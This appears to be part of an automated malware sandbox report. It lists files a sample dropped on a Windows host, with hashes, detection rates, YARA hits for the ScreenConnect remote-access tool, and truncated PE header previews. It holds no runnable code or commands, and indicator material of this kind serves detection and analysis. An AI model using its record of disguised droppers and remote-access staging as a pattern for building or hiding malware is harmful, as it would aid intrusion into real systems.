SSDEEP: 24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
MD5: 18BBC3FB86E902AFB59C06811A5B01F4
SHA1: E9EA82EA8199BCB882B933A90707D7CA71F25899
SHA-256: FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
SHA-512: FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 83%
• Antivirus: Virustotal, Detection: 74%
Reputation: unknown
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5649720
Entropy (8bit):7.437063088535606
Encrypted:false
SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious:true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):621
                                                                                                                                                                                          Entropy (8bit):5.361636180307982
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6KhayoDLI4MWuPCU6yVFO5iv:ML9E4KQwKDE4KGKZI6KhRAE4KKUNb
                                                                                                                                                                                          MD5:1046826584BB384FCAB6BD1EB6AB124E
                                                                                                                                                                                          SHA1:67659C715440EDB80D1EE39205E3340C535A4772
                                                                                                                                                                                          SHA-256:2127F53B2007583A189268CC06216B9FCB10A990879D3E47C5FFED8017176687
                                                                                                                                                                                          SHA-512:57600BAB3C3AB35EBA613F8D142B7388316C72D5AF573F6E41DFC844E6588A128DEDF538790F23C0DCEAC7991D8CB2376B291177A9A619291248E73B08AD24F2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                                                                          Process:C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1119
                                                                                                                                                                                          Entropy (8bit):5.345080863654519
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                                                                          MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                                                                          SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                                                                          SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                                                                          SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process:C:\Users\user\Desktop\RPHbzz3JqY.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):331776
Entropy (8bit):6.635102478988021
Encrypted:false
SSDEEP:6144:/DiElZeVJ9/+pPQHe5wocklXck9UBd4MvQhdaAadaH8CaTnlmIa+w4Iqr6KGus24:/DiETMgqkKBJm5+fnHYftcv7vQG6zIs
MD5:848ABDBD09C052799A0E0180B59F6FEE
SHA1:2F73B04BAF17C3A9F9D21F6F324D64306A10682C
SHA-256:1AA0622A744EC4D28A561BAC60EC5E907476587EFBADFDE546D2B145BE4B8109
SHA-512:EB3A87E787D151915DA06F89132D6E5B9B7682A3A69761795180050F42C7FBE8831049EE96410E7B7DE5E7C835CEFF1E24E84321CCCF8D6ED9BA5928BCA58203
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\user\Desktop\RPHbzz3JqY.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:unknown
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Users\user\AppData\Local\Temp\gtxkvh.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):710144
Entropy (8bit):7.502820216844358
Encrypted:false
SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
MD5:631670BEA7DD01CB347C389294714438
SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
Malicious:true
Reputation:unknown
Process:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):710144
Entropy (8bit):7.502820216844358
Encrypted:false
SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
MD5:631670BEA7DD01CB347C389294714438
SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\gtxkvh.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):710144
Entropy (8bit):7.502820216844358
Encrypted:false
SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
MD5:631670BEA7DD01CB347C389294714438
SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):710144
Entropy (8bit):7.502820216844358
Encrypted:false
SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
MD5:631670BEA7DD01CB347C389294714438
SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
Entropy (8bit):7.703603560955088
Encrypted:false
SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
MD5:18BBC3FB86E902AFB59C06811A5B01F4
SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
Malicious:true
Reputation:unknown
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
